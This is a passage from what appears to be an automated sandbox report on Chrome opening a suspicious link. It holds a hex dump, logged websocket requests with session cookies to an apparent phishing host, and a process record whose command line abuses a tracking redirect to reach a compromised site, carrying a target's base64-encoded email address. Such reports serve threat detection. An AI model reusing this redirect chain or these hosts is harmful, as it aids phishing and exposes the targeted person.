10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:16 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:16 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:16 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:16 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:16 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:16 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                2024-05-30 10:21:16 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                67192.168.2.449818188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:16 UTC1287OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: Upgrade
                                                Pragma: no-cache
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Upgrade: websocket
                                                Origin: https://f8gxf.oritelos.ru
                                                Sec-WebSocket-Version: 13
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3D
                                                Sec-WebSocket-Key: +bTMGAdoN87sqqzFohmPGg==
                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                2024-05-30 10:21:17 UTC583INHTTP/1.1 400 Bad Request
                                                Date: Thu, 30 May 2024 10:21:17 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ezgVgZHOcLkMbk16p0OpBDtRHBayzp8Ub1bxFZyxX2LCwa7%2BZYqmE3RTv5EP7AtH6iiA605UEZcrwAQzlVuY6NgDOHU%2FBQti8EulE%2BpTJpcKgXIg9LqMU8E0VULXwC1%2F6eAxiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 88bdff143fb20f8f-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:21:17 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                Data Ascii: 22{"code":3,"message":"Bad request"}
                                                2024-05-30 10:21:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                68192.168.2.449820188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:25 UTC1287OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: Upgrade
                                                Pragma: no-cache
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Upgrade: websocket
                                                Origin: https://f8gxf.oritelos.ru
                                                Sec-WebSocket-Version: 13
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3D
                                                Sec-WebSocket-Key: M620d7qGMuvu3N/tsCU05g==
                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                2024-05-30 10:21:26 UTC577INHTTP/1.1 400 Bad Request
                                                Date: Thu, 30 May 2024 10:21:26 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aAldtX1y0HzhIjwzYSXlcx7MU7PWXZfEbThVLVLbTekSfIetU%2B1INgoYMHUCma5Ke1uLyGIwTuQOuz7sCaOWQA3i3Xvz8Tury6ew0anGjDAHDY2TtHHJSHrd1tCv8Oa3MkqoPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 88bdff4b5df11a40-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:21:26 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                Data Ascii: 22{"code":3,"message":"Bad request"}
                                                2024-05-30 10:21:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                69192.168.2.449823188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:37 UTC1287OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: Upgrade
                                                Pragma: no-cache
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Upgrade: websocket
                                                Origin: https://f8gxf.oritelos.ru
                                                Sec-WebSocket-Version: 13
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3D
                                                Sec-WebSocket-Key: +tobkqSfi+bGncWgJSlwRw==
                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                2024-05-30 10:21:37 UTC577INHTTP/1.1 400 Bad Request
                                                Date: Thu, 30 May 2024 10:21:37 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xsA9YAJ2IDgT6a9i1hur5nYrOF3WTmQxywZ6lL51cIAXQrUSIVAz85U70x2KK4Q3ZBNaJPmc93CCsiM5iJB4V52BDoGe6RPH%2BKUjmoOrBDaULEou3CJai3ejbAzUuCq7jGu2Tg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 88bdff94da560c8a-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:21:37 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                Data Ascii: 22{"code":3,"message":"Bad request"}
                                                2024-05-30 10:21:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                70192.168.2.44982535.190.80.14434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:47 UTC538OUTOPTIONS /report/v4?s=MoiSxzuww3vBWA14pxdaZRJmYA6faUxkXVbkS%2BCDvfvaNQNXJooN93SdQDTHpg0%2BmZp8f1%2B0jrwD15J9U1My48N1T9tY%2FXnsvCiFODAGhtnL2wxsIjGK2BQHa4ihAA%3D%3D HTTP/1.1
                                                Host: a.nel.cloudflare.com
                                                Connection: keep-alive
                                                Origin: https://f8gxf.oritelos.ru
                                                Access-Control-Request-Method: POST
                                                Access-Control-Request-Headers: content-type
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:21:47 UTC336INHTTP/1.1 200 OK
                                                content-length: 0
                                                access-control-max-age: 86400
                                                access-control-allow-methods: OPTIONS, POST
                                                access-control-allow-origin: *
                                                access-control-allow-headers: content-type, content-length
                                                date: Thu, 30 May 2024 10:21:47 GMT
                                                Via: 1.1 google
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                71192.168.2.44982635.190.80.14434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:48 UTC478OUTPOST /report/v4?s=MoiSxzuww3vBWA14pxdaZRJmYA6faUxkXVbkS%2BCDvfvaNQNXJooN93SdQDTHpg0%2BmZp8f1%2B0jrwD15J9U1My48N1T9tY%2FXnsvCiFODAGhtnL2wxsIjGK2BQHa4ihAA%3D%3D HTTP/1.1
                                                Host: a.nel.cloudflare.com
                                                Connection: keep-alive
                                                Content-Length: 861
                                                Content-Type: application/reports+json
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:21:48 UTC861OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 31 33 38 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 32 34 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 38 67 78 66 2e 6f 72 69 74 65 6c
                                                Data Ascii: [{"age":31389,"body":{"elapsed_time":1241,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error","url":"https://f8gxf.oritel
                                                2024-05-30 10:21:48 UTC168INHTTP/1.1 200 OK
                                                content-length: 0
                                                date: Thu, 30 May 2024 10:21:47 GMT
                                                Via: 1.1 google
                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                Connection: close


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                72192.168.2.449827188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:58 UTC1287OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: Upgrade
                                                Pragma: no-cache
                                                Cache-Control: no-cache
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Upgrade: websocket
                                                Origin: https://f8gxf.oritelos.ru
                                                Sec-WebSocket-Version: 13
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6ImpucThUdW92dWM1SDdIQ2ZndHJhMGc9PSIsInZhbHVlIjoiU2lXUnluQjA1MkptcCtJeTlBUWFyVktHR3psdkhNVE9qRHk3OGFkamRNTVo3VEp3Y0xvZ25XR2FML2JtVU1EemJHdFFkY1hEaWt6VkpxRktGbW5xVmN1ckhBaElZejdHN0xVSzhObUlBekdzNUxhN25jYzJwOTZPZ0ZkcWtZK0MiLCJtYWMiOiIzZjVjYmQ4NDZmZTI2ZmJmMGIxNDlmNjFhZWRjMzk4ZWRmMDczMzYxNTlhZTg5ZmE1OTNmYjI2OGIyMTgyNmI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im4xL0hLNjljYUFlRDgxRjhYWk5LRFE9PSIsInZhbHVlIjoiM3pjZ0pPQktSZ01ud215WC91R3RhZFBUTTBNbUROVktBSDFoYjBrWWZ1Q1lJd1U2TThJcEx1VkpnWjRyS21yU2FCUXFKZ0VDQUpJRlFvYlREK3ErSlFKcmk5azZyZ29RZU0vNDF1Nkptdlp6ZlFYL2x4b0tlWFVaU3g5MElKZ28iLCJtYWMiOiI2YmI1OWU4YzUxN2VmYzA2ZDhkODk3MGU3ZTQzZjJkMmY5MDc4Yjg4ZGVjZjBmODM2NmVkYTJkODE4ODM1ZDA3IiwidGFnIjoiIn0%3D
                                                Sec-WebSocket-Key: 78NHLiPrbhh4WdYewpDR8A==
                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                2024-05-30 10:21:59 UTC581INHTTP/1.1 400 Bad Request
                                                Date: Thu, 30 May 2024 10:21:59 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J0ZGK0UZP%2BkRF59zmwJO35xTpZ84BaqKtkC3lIB7gfQWrnhIZEyne7YRN4n9c8didsZ4wDvOh4zznVxxqRAJJIocoDh43mgv0LreGgePI%2BDYj2Y9oVCIlvsAmocE%2F1idksV57w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 88be00193c141815-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:21:59 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                Data Ascii: 22{"code":3,"message":"Bad request"}
                                                2024-05-30 10:21:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                020406080s020406080100

                                                Click to jump to process

                                                020406080s0.0050100MB

                                                Click to jump to process

                                                Target ID:0
                                                Start time:06:20:32
                                                Start date:30/05/2024
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                Imagebase:0x7ff76e190000
                                                File size:3'242'272 bytes
                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:false

                                                Target ID:2
                                                Start time:06:20:34
                                                Start date:30/05/2024
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1708,i,9045649938219728694,6714162670049641950,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                Imagebase:0x7ff76e190000
                                                File size:3'242'272 bytes
                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:false

                                                Target ID:3
                                                Start time:06:20:36
                                                Start date:30/05/2024
                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://t.email1.gct.com/r/?id=hfffbb46%2Cc90b147%2Cc90b14f&jobcode=739-0055&omtr_camp=em%3ACORP%3APREN%3ASPROD%3A268417862%3Agcc_DM212754%3A739-0055&lpg=xcBOkfEbudlaXz7yNVldPQ%3D%3D&cid=gcc_DM212754&bid=268417862&rid=1061475&p1=debssiebeads.co.ke/wp/#?email=aWFuLmhhbmNvY2tAYmFlc3lzdGVtcy5jb20="
                                                Imagebase:0x7ff76e190000
                                                File size:3'242'272 bytes
                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                No disassembly